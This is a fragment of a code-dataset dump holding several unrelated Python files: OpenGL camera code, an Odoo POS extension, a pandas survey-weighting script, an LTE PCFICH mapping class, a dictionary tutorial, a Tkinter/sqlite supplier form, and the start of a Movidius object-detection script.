cameraUp\n mat_view = glm.lookAt(cameraPos, cameraPos + cameraFront, cameraUp);\n mat_view = np.array(mat_view)\n return mat_view\n\ndef projection():\n global altura, largura\n # perspective parameters: fovy, aspect, near, far\n mat_projection = glm.perspective(glm.radians(45.0), largura/altura, 0.1, 1000.0)\n mat_projection = np.array(mat_projection) \n return mat_projection\n \nglfw.show_window(window)\nglfw.set_cursor_pos(window, lastX, lastY)\n\nglEnable(GL_DEPTH_TEST) ### importante para 3D\n \nang = 0.1\n \nwhile not glfw.window_should_close(window):\n\n glfw.poll_events() \n \n \n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n \n #glClearColor(0.2, 0.2, 0.2, 1.0)\n \n if polygonal_mode==True:\n glPolygonMode(GL_FRONT_AND_BACK,GL_LINE)\n if polygonal_mode==False:\n glPolygonMode(GL_FRONT_AND_BACK,GL_FILL)\n \n desenha_esfera() \n #ang+=0.02\n x= np.cos(ang)*4\n z= np.sin(ang)*4\n desenha_luz(x, 0.0, z) \n\n \n mat_view = view()\n loc_view = glGetUniformLocation(program, \"view\")\n glUniformMatrix4fv(loc_view, 1, GL_FALSE, mat_view)\n\n mat_projection = projection()\n loc_projection = glGetUniformLocation(program, \"projection\")\n glUniformMatrix4fv(loc_projection, 1, GL_FALSE, mat_projection) 
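# Standalone check of the yaw/pitch-to-direction conversion mouse_event
# uses above (the same spherical-to-Cartesian formula, no OpenGL needed).
import math

def front_vector(yaw_deg, pitch_deg):
    yaw, pitch = math.radians(yaw_deg), math.radians(pitch_deg)
    x = math.cos(yaw) * math.cos(pitch)
    y = math.sin(pitch)
    z = math.sin(yaw) * math.cos(pitch)
    n = math.sqrt(x * x + y * y + z * z)
    return (x / n, y / n, z / n)

# yaw=-90, pitch=0 should give approximately (0, 0, -1), matching the
# initial cameraFront.
print(front_vector(-90.0, 0.0))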
\n \n # atualizando a posicao da camera/observador na GPU para calculo da reflexao especular\n loc_view_pos = glGetUniformLocation(program, \"viewPos\") # recuperando localizacao da variavel viewPos na GPU\n glUniform3f(loc_view_pos, cameraPos[0], cameraPos[1], cameraPos[2]) ### posicao da camera/observador (x,y,z)\n \n glfw.swap_buffers(window)\n\nglfw.terminate()","sub_path":"aula12/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":19911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640734176","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\n\n\nclass POSOrder(models.Model):\n\t_inherit = 'pos.order'\n\n\t@api.model\n\tdef _order_fields(self, ui_order):\n\t\tres = super(POSOrder, self)._order_fields(ui_order)\n\t\tpos_session = self.env['pos.session'].browse(ui_order['pos_session_id'])\n\t\tif pos_session.sequence_number <= ui_order['sequence_number']:\n\t\t\tpos_session.write({'sequence_number': ui_order['sequence_number'] + 1})\n\t\t\tpos_session.refresh()\n\t\treturn res\n","sub_path":"mai_pos_custom_order_number-13.0.13.1.1.1/mai_pos_custom_order_number/models/pos_order.py","file_name":"pos_order.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"290654482","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport pandas as pd\n\ndef Weighting():\n \n # #### Import Daily Count Stacked File *(refresh that file with stacker program)*\n \n # In[2]:\n \n df = pd.read_excel(r\"S:\\MarketFo\\Short eCSI Raw Data\\Merged Data\\Master Obs Count Data.xlsx\")\n df.dropna(inplace=True, how='all', axis=1)\n #df.head(1)\n \n \n # In[3]:\n \n df['Number of Completed Surveys'].fillna(0, inplace=True)\n df['Sampled Customers (Extracted to WBA)'] = df['Sampled Customers (Extracted to WBA)'].astype('float')\n \n \n # #### Create weight field\n # * Numerator = response counts\n # * (**\"Number of Completed Surveys\"** in HH counts file)\n # * Denominator = sample counts\n # * (**\"Sampled Customers (Extracted to WBA)\"** in HH counts file)\n \n # In[4]:\n \n df['weight'] = df['Number of Completed Surveys']/df['Sampled Customers (Extracted to WBA)']\n \n \n # #### Parse data to Route Code, Route Name, Date, and Weight\n # * Date equates to \"senddate\" for join in WBA daily data files\n \n # In[5]:\n \n parsed = df[['File Run Date', 'Route Name', 'Route Code', 'weight']]\n #parsed.head()\n \n \n # #### Join weights onto Master Short Survey Data\n \n # In[6]:\n \n master = pd.read_excel(r\"S:\\MarketFo\\Short eCSI Raw Data\\Merged Data\\Master Short Survey Data.xlsx\")\n #master.head(1)\n \n \n # In[7]:\n \n routeLkp = {\n 'Lake Shore Limited':'Lake Shore Ltd.',\n 'Capitol Limited':'Capitol Ltd.',\n 'Northeast Regional (Spine) - Business Cl':'Northeast Regional (Spine) - Business Class',\n 'Kansas City-St. Louis':'Kansas City-St. 
Louis (Missouri River Runner)',\n 'Sunset Limited':'Sunset Ltd.',\n 'Washington - Norfolk':'Washington-Norfolk'\n }\n \n master['Batch Date'] = pd.to_datetime(master['senddate'], format='%Y%m%d')\n master['Norm Route'] = master['ROUTENAME'].apply(lambda x: x if x not in routeLkp.keys() else routeLkp[x])\n \n \n # In[8]:\n \n master_weighted = master.merge(parsed, how='left', left_on=['Batch Date', 'Norm Route', 'RT'], right_on=['File Run Date', 'Route Name', 'Route Code'])\n master_weighted_parsed = master_weighted[[\n 'UNIQ_ID',\n 'LINE',\n 'DATETIM',\n 'ROUTENAME',\n 'RT',\n 'TRAIN',\n 'ORIGIN',\n 'DESTINATION',\n 'C',\n 'DATE',\n 'FD',\n 'CNT',\n 'PNR',\n 'senddate',\n 'RAIL_AMOUNT',\n 'ACCOM_AMT',\n 'VEHICLE_AMT',\n 'TOTALFARE_AMT',\n 'AGR_TIER',\n 'ORIGIN_SCODE',\n 'DESTINATION_SCODE',\n 'TICKET_COUNT',\n 'ELIGIBLE_TICKET_COUNT',\n 'NEW_CUST',\n 'FIRST_TRIP_DATE',\n 'Q1',\n 'Q2',\n 'Q3',\n 'Q4',\n 'Q5',\n 'Q6',\n 'Q7',\n 'Q8',\n 'Q9',\n 'Q10',\n 'Q11',\n 'Batch Date',\n 'weight']]\n #master_weighted_parsed.head()\n \n \n # #### Export to Excel\n \n # In[9]:\n \n master_weighted_parsed.to_excel(r\"S:\\MarketFo\\Short eCSI Raw Data\\Merged Data\\Master Short Survey Data Weighted.xlsx\", index=False)\n \n # ## --------------------- QC --------------------------\n \n # routeLkp = {\n # 'Lake Shore Limited':'Lake Shore Ltd.',\n # 'Capitol Limited':'Capitol Ltd.',\n # 'Northeast Regional (Spine) - Business Cl':'Northeast Regional (Spine) - Business Class',\n # 'Kansas City-St. Louis':'Kansas City-St. Louis (Missouri River Runner)',\n # 'Sunset Limited':'Sunset Ltd.',\n # 'Washington - Norfolk':'Washington-Norfolk'\n # }\n # \n \n # #### Join weights onto WBA daily data master file for QC\n \n # qc = pd.read_excel(r\"C:\\Users\\90012831\\Documents\\eCSI Short Survey Data\\Raw Data\\QC Weighting OVERALL Amtrak Everyday Datafile 0122 v2 weighted data.xlsx\")\n \n # qc['Batch Date'] = pd.to_datetime(qc['senddate'], format='%Y%m%d')\n \n # qc['Norm Route'] = qc['ROUTENAME'].apply(lambda x: x if x not in routeLkp.keys() else routeLkp[x])\n \n # test = qc.merge(df, how='left', left_on=['RT', 'Norm Route', 'Batch Date'], right_on=['Route Code', 'Route Name', 'File Run Date'])\n \n # test['qc'] = test['weight_x'].round(5)==test['weight_y'].round(5)\n \n # #test[test['qc']==False].groupby(['RT', 'Route Code', 'Norm Route', 'Route Name', 'Batch Date', 'File Run Date', 'weight_x', 'weight_y']).agg({'qc':'count'})\n # test[test['qc']==False].groupby(['Norm Route', 'Batch Date', 'File Run Date', 'weight_x', 'Number of Completed Surveys', 'Sampled Customers (Extracted to WBA)', 'weight_y']).agg({'qc':'count'})\n \n # test['weight_x'].describe()\n \n # test['weight_y'].describe()\n \n # test[['Norm Route', 'Batch Date', 'File Run Date', 'weight_x', 'Number of Completed Surveys', 'Sampled Customers (Extracted to WBA)', 'weight_y', 'qc']]","sub_path":"src/python/projects/eCSI Short Survey/1-Production/Archived py Files/Daily_Weight_Creation_and_Assignment.py","file_name":"Daily_Weight_Creation_and_Assignment.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"68525481","text":"__author__ = 'shenojia'\n\nimport sys\nimport numpy as np\nfrom math import floor\nfrom matplotlib.path import Path\nfrom matplotlib.patches import PathPatch\nsys.path.insert(0, '.')\nsys.path.insert(0, '..')\nfrom R12_36211.SLOT import SLOT\nfrom R12_36xxx.TypesDefition import *\nfrom R12_36xxx.HighLayer import conf\n\nclass PCFICH:\n\n 
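# Toy version of the weighting join in Weighting() above: weight =
# completed surveys / sampled customers per route and day, merged back
# onto survey rows. Column values are shortened stand-ins, not real data.
import pandas as pd

counts = pd.DataFrame({
    "route": ["Capitol Ltd."],
    "date": pd.to_datetime(["2019-01-22"]),
    "completed": [40.0],
    "sampled": [200.0],
})
counts["weight"] = counts["completed"] / counts["sampled"]

surveys = pd.DataFrame({
    "route": ["Capitol Ltd."],
    "date": pd.to_datetime(["2019-01-22"]),
    "Q1": [5],
})
print(surveys.merge(counts[["route", "date", "weight"]],
                    on=["route", "date"], how="left"))  # weight == 0.2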
def __init__(self,subFrameNumber:int,subFrameType:SubFrameType, MBSFN:bool, PRS:bool):\n # self.res = self._initRes(slot)\n self.res = []\n self.n__s = None\n self.n = subFrameNumber\n self.subFrameType = subFrameType\n self.MBSFN = MBSFN\n self.PRS = PRS\n self.N__OFDM = self._initNumOfOfdmSymb4PDCCH(conf.numOfOfdmSymb4PDCCH)\n self.patch, self.codes, self.vertices = [],[],[]\n\n def _initRes(self, slot:SLOT):\n \"\"\"\n 6.7.4\tMapping to resource elements\n :param slot:\n :return:\n \"\"\"\n res = []\n if slot.n__s!=0:\n return None\n else:\n self.n__s = slot.n__s\n l = 0\n k_bar = conf.N__sc___RB_DL/2*(conf.N__ID___cell%2*conf.N__RB___DL)\n for n in range(4):\n k = k_bar + floor(n*conf.N__RB___DL/2)*conf.N__sc___RB_DL/2\n k___singleQuote = int(k/6)\n l___singleQuote = l\n reg = slot.rgs[0].reg(k___singleQuote, l___singleQuote)\n # reg = slot.rgs[0].regs[(k___singleQuote, l___singleQuote)]\n for re in reg().res:\n if re().t.typeName == 'crs':\n continue\n else:\n res.append(re)\n re().p = 0\n re().a = 0 #TODO: shall initialized with actual precoding result\n re().t = ReType('pcfich')\n\n self.res = res\n self.patch, self.codes, self.vertices = self._initPatch()\n\n\n #TODO: 6.7.1 Scrambling\n #TODO: 6.7.2 Modulation\n #TODO: 6.7.3 Layer mapping and precoding\n def _initNumOfOfdmSymb4PDCCH(self, numOfOfdmSymb4PDCCH:int):\n \"\"\"\n Tabel 6.7-1:Number of OFDM symbols used for PDCCH\n init and assert num of OFDM symbols for PDCCH based on cell configuration\n :param numOfOfdmSymb4PDCCH:\n :return:\n \"\"\"\n\n print(conf.P_crs)\n if (self.n == 1 or self.n == 6) and conf.FrameStructureType.frameStructureTypeName == 'TDD':\n if conf.N__RB___DL > 10:\n assert (numOfOfdmSymb4PDCCH ==1 or numOfOfdmSymb4PDCCH ==2 )\n return numOfOfdmSymb4PDCCH\n else:\n return 2\n elif (self.subFrameType.subFrameTypeName != 'U') and (self.MBSFN == True) and (conf.N__ANT_PORTS <= 2):\n if conf.N__RB___DL > 10:\n assert (numOfOfdmSymb4PDCCH ==1 or numOfOfdmSymb4PDCCH ==2 )\n return numOfOfdmSymb4PDCCH\n else:\n return 2\n elif self.subFrameType.subFrameTypeName != 'U' and self.MBSFN == True and conf.N__ANT_PORTS == 4:\n return 2\n elif self.subFrameType.subFrameTypeName == 'U':\n return 0\n elif self.MBSFN == False and self.PRS == True and (self.n != 6 and conf.FrameStructureType.frameStructureTypeName == 'TDD'):\n if conf.N__RB___DL > 10:\n assert (numOfOfdmSymb4PDCCH == 1 or numOfOfdmSymb4PDCCH == 2 or numOfOfdmSymb4PDCCH == 3 )\n return numOfOfdmSymb4PDCCH\n else:\n assert (numOfOfdmSymb4PDCCH == 2 or numOfOfdmSymb4PDCCH == 3 )\n return numOfOfdmSymb4PDCCH\n else:\n if conf.N__RB___DL > 10:\n assert (numOfOfdmSymb4PDCCH == 1 or numOfOfdmSymb4PDCCH == 2 or numOfOfdmSymb4PDCCH == 3 )\n return numOfOfdmSymb4PDCCH\n else:\n assert (numOfOfdmSymb4PDCCH == 2 or numOfOfdmSymb4PDCCH == 3 or numOfOfdmSymb4PDCCH == 4)\n return numOfOfdmSymb4PDCCH\n\n def _initPatch(self):\n \"\"\"\n deprecated!!!!\n get pathPatches for plotting res for CRS of dedicate port\n :return:\n \"\"\"\n codes = []\n vertices = []\n for re in self.res:\n codes += re().codes\n vertices += re().vertices\n\n path = Path(vertices, codes)\n patch = PathPatch(path, facecolor='white', edgecolor='black', linewidth=0.2, fill='none')\n patch.set_zorder(90)\n return patch, codes, vertices","sub_path":"R12_36211/PCFICH.py","file_name":"PCFICH.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"531422670","text":"\n\"\"\"\nExecute the below code in a cell by cell 
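# Precedence note for the k_bar line in PCFICH._initRes above: '%' and '*'
# bind equally and associate left in Python, so `cell % 2 * n_rb` means
# `(cell % 2) * n_rb`, while TS 36.211 6.7.4 defines
# k_bar = (N_sc_RB / 2) * (N_ID_cell mod 2*N_RB_DL), with the modulus taken
# over the whole product. The values below are illustrative only.
cell_id, n_rb, n_sc = 7, 50, 12
as_written = n_sc / 2 * (cell_id % 2 * n_rb)    # (7 % 2) * 50 -> 300.0
per_spec = n_sc / 2 * (cell_id % (2 * n_rb))    # 7 % 100      -> 42.0
print(as_written, per_spec)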
and see the output. There are Assignments to do it by your own, so complete that as well\nUse Spyder to run and execute these .py files\n\"\"\"\n\nfruit_basket = {\"Apple\": \"Red\", \"Orange\": \"Orange\", \"Banana\": \"Yellow\"}\nfruit_basket['Apple']\nfruit_basket['Orange']\nfruit_basket[\"strawberry\"] = \"Red\" # adding new element\ndel fruit_basket[\"strawberry\"] # deleting on key\n\n\n# Accesing Values from Dictionary\n\n\nfruits = {\"Apple\": [\"Red\", \"round\"], \"Orange\": [\"Orange\", \"round\"], \"Banana\": [\"Yellow\", \"hook\"]}\nfruits[\"Apple\"][0]\nfruits[\"Orange\"][0]\n\n\n# Accesing all the keys and values\n\nfruits.keys()\nfruits.values()\n\nfor k in fruits:\n print(k, fruits[k])\n\n\n\n# Multi dimensional Dictionary\n\nfruits = {\"fruits_name\":{\n \"Apple\":{\n \"color\":\"red\",\n \"Shape\": \"round\"\n \n },\n \n \"Orange\":{\n \"color\":\"Orange\",\n \"Shape\": \"round\"\n }\n}}\n\nfruits[\"fruits_name\"]\nfruits[\"fruits_name\"][\"Apple\"]\n\n\n## python Dictionary Comprehension\n\nsquares = {x: x**x for x in range(1,10)}\neven_numbers = {x: x**x for x in range(1,10) if x%2==0}\n\n\n\n\n","sub_path":"05_dictionary.py","file_name":"05_dictionary.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"623743077","text":"import sqlite3\nimport datetime\nfrom tkinter import *\nfrom tkinter import filedialog, messagebox, ttk\n\n\nclass Proveedores:\n\n db_name = 'BaseDatos.db' \n\n def Inicio(self):\n # Ventana principal \n ventana = Tk()\n self.icono = \"@../GrupoD-Proyecto/Iconos/Registradora.xbm\"\n ventana.iconbitmap(self.icono)\n ventana.resizable(0,0)\n ventana.config(bg = \"#83D6A8\")\n ox, oy = ventana.winfo_screenwidth()/2, ventana.winfo_screenwidth()/2\n ventana.geometry(\"=1300x244+%d+%d\" % (ox-650, oy-450))\n self.titulo = \"Proveedores\"\n ventana.title(self.titulo)\n\n # Creacion de frame contenedor\n frame = LabelFrame(ventana, text = 'Carga proveedor: ')\n frame.config(bg = \"#83D6A8\", pady = 12)\n frame.grid(row = 0, column = 0, columnspan = 3, sticky = W + E)\n\n frame_tabla = LabelFrame(ventana, text = 'Proveedores: ')\n frame_tabla.config(bg = \"#83D6A8\")\n frame_tabla.grid(row = 0, column = 10, columnspan = 3, sticky = W + E)\n self.mensaje2 = Label(frame_tabla, text = '', font = (\"arial 14\"), bg = \"#83D6A8\")\n self.mensaje2.grid(row = 0, column = 0)\n\n val_num = (frame.register(self.lee_numero), '%S')\n val_str = (frame.register(self.lee_str), '%S')\n\n # Entrada Empresa\n Label(frame, text = 'Empresa: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 1, column = 0)\n self.empresa = Entry(frame, validate = 'key', validatecommand = val_str)\n self.empresa.focus()\n self.empresa.grid(row = 1, column = 1)\n\n # Entrada CUIT Empresa\n Label(frame, text = 'CUIT Empresa: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 2, column = 0)\n self.cuit_empresa = Entry(frame, validate = 'key', validatecommand = val_num)\n self.cuit_empresa.focus()\n self.cuit_empresa.grid(row = 2, column = 1)\n\n\n # Entrada Nombre-Contacto\n Label(frame, text = 'Nombre: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 3, column = 0)\n self.nombre = Entry(frame, validate = 'key', validatecommand = val_str)\n self.nombre.focus()\n self.nombre.grid(row = 3, column = 1)\n\n # Entrada DNI\n Label(frame, text = 'DNI: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 4, column = 0)\n self.dni = Entry(frame, validate = 'key', validatecommand = val_num)\n 
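# Note on the comprehensions in 05_dictionary.py above: x**x is "x to the
# power x", so the dict named `squares` does not actually hold squares.
# Corrected versions:
squares = {x: x ** 2 for x in range(1, 10)}
even_squares = {x: x ** 2 for x in range(1, 10) if x % 2 == 0}
print(squares[3], even_squares[4])  # 9 16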
self.dni.focus()\n self.dni.grid(row = 4, column = 1)\n\n # Entrada Celular\n Label(frame, text = 'Celular: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 5, column = 0)\n self.celular = Entry(frame, validate = 'key', validatecommand = val_num)\n self.celular.focus()\n self.celular.grid(row = 5, column = 1)\n\n # Entrada Correo\n Label(frame, text = 'Correo: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 6, column = 0)\n self.correo = Entry(frame)\n self.correo.focus()\n self.correo.grid(row = 6, column = 1)\n\n # Entrada Fecha\n self.fecha = datetime.datetime.now().date()\n\n # Tabla\n self.tabla = ttk.Treeview(frame_tabla, height = 7, columns = ('#1','#2','#3','#4','#5', '#6'))\n self.tabla.grid(row = 0, column = 0, columnspan = 2, sticky= W)\n self.tabla.heading('#0', text = 'Fecha', anchor = CENTER)\n self.tabla.heading('#1', text = 'Empresa', anchor = CENTER)\n self.tabla.heading('#2', text = 'CUIT Empresa', anchor = CENTER)\n self.tabla.heading('#3', text = 'Nombre', anchor = CENTER)\n self.tabla.heading('#4', text = 'DNI', anchor = CENTER)\n self.tabla.heading('#5', text = 'Celular', anchor = CENTER)\n self.tabla.heading('#6', text = 'Correo', anchor = CENTER)\n\n self.tabla.column('#0', width = 100, stretch = False, anchor = CENTER)\n self.tabla.column('#1', width = 175, stretch = False, anchor = CENTER)\n self.tabla.column('#2', width = 115, stretch = False, anchor = CENTER)\n self.tabla.column('#3', width = 175, stretch = False, anchor = CENTER)\n self.tabla.column('#4', width = 75, stretch = False, anchor = CENTER)\n self.tabla.column('#5', width = 100, stretch = False, anchor = CENTER)\n self.tabla.column('#6', width = 215, stretch = False, anchor = CENTER)\n\n # Botones\n ttk.Button(frame, text = 'GUARDAR', command = self.cargar_datos).grid(row = 12, column = 1, sticky = W + E)\n boton_editar = ttk.Button(frame_tabla, text = 'EDITAR', command = self.editar)\n boton_editar.config(width = 58)\n boton_editar.grid(row = 10, column = 0)\n boton_borrar = ttk.Button(frame_tabla, text = 'BORRAR', command = self.borrar)\n boton_borrar.config(width = 58)\n boton_borrar.grid(row = 10, column = 1)\n\n self.obtener_dato()\n ventana.mainloop()\n\n # 'chekeo' de la tabla \n def ejecuta_consulta(self, consulta, parametros = ()):\n with sqlite3.connect(self.db_name) as conn:\n cursor = conn.cursor() \n resultado = cursor.execute(consulta, parametros)\n conn.commit()\n return resultado\n raise Exception(' NO SE PUDO CONECTAR A LA BASE DE DATOS. 
')\n\n # Limpia tabla\n def obtener_dato(self):\n graba = self.tabla.get_children()\n for elemento in graba:\n self.tabla.delete(elemento)\n consulta = 'SELECT * FROM Proveedores'\n filas_bd = self.ejecuta_consulta(consulta)\n for row in filas_bd:\n self.tabla.insert('', 0, text = row[1], values = (row[2], row[3], row[4], row[5], row[6], row[7]))\n\n # Validacion general (todos los campos estan llenos)\n def validacion(self):\n if (len(self.empresa.get()) != 0 and len(self.cuit_empresa.get()) != 0 and len(self.nombre.get()) != 0 and len(self.dni.get()) != 0 and len(self.celular.get()) != 0 and len(self.correo.get()) != 0):\n return TRUE\n else:\n return FALSE\n\n # Validacion Numeros\n @staticmethod\n def lee_numero(aux_0):\n return aux_0.isdigit()\n \n # Validacion Str\n @staticmethod\n def lee_str(aux_1):\n if aux_1.isalpha() or aux_1.isspace():\n return True\n else:\n return False\n\n # Funcion para cargar\n def cargar_datos(self):\n if self.validacion() == TRUE:\n consult = 'INSERT INTO Proveedores VALUES(NULL, ?, ?, ?, ?, ?, ?, ?)'\n parametros = (self.fecha, self.empresa.get(), self.cuit_empresa.get(), self.nombre.get(), self.dni.get(), self.celular.get(), self.correo.get())\n self.ejecuta_consulta(consult, parametros)\n self.obtener_dato()\n self.empresa.delete(0, END)\n self.cuit_empresa.delete(0, END)\n self.nombre.delete(0, END)\n self.dni.delete(0, END)\n self.celular.delete(0, END)\n self.correo.delete(0, END)\n\n # Funcion para borrar\n\n def borrar (self):\n \n if self.tabla.item(self.tabla.selection())['text'] == '':\n self.mensaje2['text'] = 'Por favor, seleccione un elemento'\n return\n empresa = self.tabla.item(self.tabla.selection())['values'][0]\n consulta = 'DELETE FROM Proveedores WHERE empresa = ?'\n self.ejecuta_consulta(consulta, (empresa, ))\n self.mensaje2['text'] = 'Se a eliminado a {} de tu lista de proveedores. 
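# Self-contained sketch of the parameterized-query pattern that
# ejecuta_consulta above relies on (placeholders keep user input out of
# the SQL text). The in-memory database and table are illustrative.
import sqlite3

with sqlite3.connect(":memory:") as conn:
    cur = conn.cursor()
    cur.execute("CREATE TABLE Proveedores (empresa TEXT)")
    cur.execute("INSERT INTO Proveedores VALUES (?)", ("ACME",))
    cur.execute("DELETE FROM Proveedores WHERE empresa = ?", ("ACME",))
    conn.commit()
    print(cur.execute("SELECT COUNT(*) FROM Proveedores").fetchone())  # (0,)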
'.format(empresa)\n self.obtener_dato()\n \n # Funcion para editar\n\n def editar (self):\n\n # Funcion editar valores\n self.mensaje2[\"text\"] = ''\n if self.tabla.item(self.tabla.selection())[\"text\"] == \"\":\n self.mensaje2[\"text\"] = \"Por favor, seleccione un elemento\"\n return\n\n # tabla editar valores\n empresa = self.tabla.item(self.tabla.selection())[\"values\"][0]\n cuit_empresa = self.tabla.item(self.tabla.selection())[\"values\"][1]\n nombre = self.tabla.item(self.tabla.selection())[\"values\"][2]\n dni = self.tabla.item(self.tabla.selection())[\"values\"][3]\n celular = self.tabla.item(self.tabla.selection())[\"values\"][4]\n correo = self.tabla.item(self.tabla.selection())[\"values\"][5]\n\n self.ventana_de_edicion = Toplevel()\n self.ventana_de_edicion.title = (\"Editar\")\n self.ventana_de_edicion.config(background=\"#83D6A8\")\n self.ventana_de_edicion.resizable(0, 0)\n self.ventana_de_edicion.config(bd=5)\n self.ventana_de_edicion.config(relief= \"solid\")\n\n #Frame Ventana Edicion\n frame69 = LabelFrame(self.ventana_de_edicion, text = '')\n frame69.config(bg = \"#83D6A8\")\n frame69.grid(row = 0, column = 0)\n\n val_num = (frame69.register(self.lee_numero), '%S')\n val_str = (frame69.register(self.lee_str), '%S')\n \n # Antiguo nombre empresa\n Label(frame69, text = 'Antigua empresa: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 0, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = empresa), state = 'readonly').grid(row = 0, column = 2)\n\n # Nuevo nombre empresa \n Label(frame69, text = 'Nueva empresa: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 0, column = 3)\n nuevo_nombre_empresa = Entry(frame69, validate = 'key', validatecommand = val_str)\n nuevo_nombre_empresa.grid(row = 0, column = 4)\n\n # Antiguo Cuit Empresa\n Label(frame69, text = 'Antiguo CUIT: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 1, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = cuit_empresa), state = 'readonly').grid(row = 1, column = 2)\n\n # Nuevo CUIT Empresa\n Label(frame69, text = 'Nuevo CUIT: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 1, column = 3)\n nuevo_cuit_empresa = Entry(frame69, validate = 'key', validatecommand = val_num)\n nuevo_cuit_empresa.grid(row = 1, column = 4)\n\n # Antiguo nombre\n Label(frame69, text = 'Antiguo nombre: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 2, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = nombre), state = 'readonly').grid(row = 2, column = 2)\n\n # Nuevo Nombre\n Label(frame69, text = 'Nuevo nombre: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 2, column = 3)\n nuevo_nombre = Entry(frame69, validate = 'key', validatecommand = val_str)\n nuevo_nombre.grid(row = 2, column = 4) \n\n # Antiguo DNI\n Label(frame69, text = 'Antiguo DNI: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 3, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = dni), state = 'readonly').grid(row = 3, column = 2)\n\n # Nuevo DNI\n Label(frame69, text = 'Nuevo DNI: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 3, column = 3)\n nuevo_dni = Entry(frame69, validate = 'key', validatecommand = val_num)\n nuevo_dni.grid(row = 3, column = 4)\n\n # Antiguo celular\n Label(frame69, text = 'Antiguo numero: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 4, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = celular), 
state = 'readonly').grid(row = 4, column = 2)\n\n # Nuevo celular\n Label(frame69, text = 'Nuevo celular', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 4, column = 3)\n nuevo_celular = Entry(frame69, validate = 'key', validatecommand = val_num)\n nuevo_celular.grid(row = 4, column = 4)\n\n # Antiguo correo\n Label(frame69, text = 'Antiguo correo: ', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 5, column = 1)\n Entry(frame69, textvariable = StringVar(self.ventana_de_edicion, value = correo), state = 'readonly').grid(row = 5, column = 2)\n\n # Nuevo correo\n Label(frame69, text = 'Nuevo correo', font = (\"arial 14\"), bg = \"#83D6A8\").grid(row = 5, column = 3)\n nuevo_correo = Entry(frame69)\n nuevo_correo.grid(row = 5, column = 4)\n\n ttk.Button(self.ventana_de_edicion, text = 'Guardar cambios', command = lambda: self.editar_valores(nuevo_nombre_empresa.get(),nuevo_cuit_empresa.get(), nuevo_nombre.get(), nuevo_dni.get(), nuevo_celular.get(), nuevo_correo.get(), empresa)).grid(row = 8, column = 0, sticky = W + E)\n self.ventana_de_edicion.mainloop()\n \n # Funcion para editar productos (dentro del boton, parte 2)\n def editar_valores(self, nuevo_nombre_empresa, nuevo_cuit_empresa, nuevo_nombre, nuevo_dni, nuevo_celular, nuevo_correo, empresa):\n consulta = 'UPDATE proveedores SET empresa = ?, Cuit_Empresa = ?, nombre = ?, dni = ?, celular = ?, correo = ? WHERE empresa = ?'\n parametros = (nuevo_nombre_empresa, nuevo_cuit_empresa, nuevo_nombre, nuevo_dni, nuevo_celular, nuevo_correo, empresa)\n self.ejecuta_consulta(consulta, parametros)\n self.ventana_de_edicion.destroy()\n self.obtener_dato()\n","sub_path":"Proveedores.py","file_name":"Proveedores.py","file_ext":"py","file_size_in_byte":12960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"38611278","text":"\n# import the necessary packages\nfrom mvnc import mvncapi as mvnc\nfrom imutils.video import VideoStream\nimport numpy as np\nimport time\nimport datetime\nimport cv2\n\nconfidence_basic=0.5\ndisplay = 1\ntime_calc = 1\nRPI = 0\n\nfps = 0\nfps_time_new = 0\nfps_time_old = datetime.datetime.now()\ni_fps = 3\ni_cycle = 0\nfps_delta = 0\n\ntimef = np.zeros(100)\n\n\n# initialize the list of class labels our network was trained to\n# detect, then generate a set of bounding box colors for each class\nCLASSES = (\"background\", \"aeroplane\", \"bicycle\", \"bird\",\n \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\",\n \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\",\n \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\")\nCOLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))\n\n# frame dimensions should be sqaure\nPREPROCESS_DIMS = (300, 300)\nDISPLAY_DIMS = (640, 480)\n\n# calculate the multiplier needed to scale the bounding boxes\nDISP_MULTIPLIER = DISPLAY_DIMS[0] // PREPROCESS_DIMS[0]\n\n\ndef Time_saving(t_number):\n if time_calc == 1:\n timef[t_number] = time.time()\n return 0\n\ndef Time_print(t_number):\n if time_calc == 1:\n print(\"time %1s: %1.1f ms\" % (t_number, (time.time() - timef[t_number])*1000))\n return 0\n\ndef 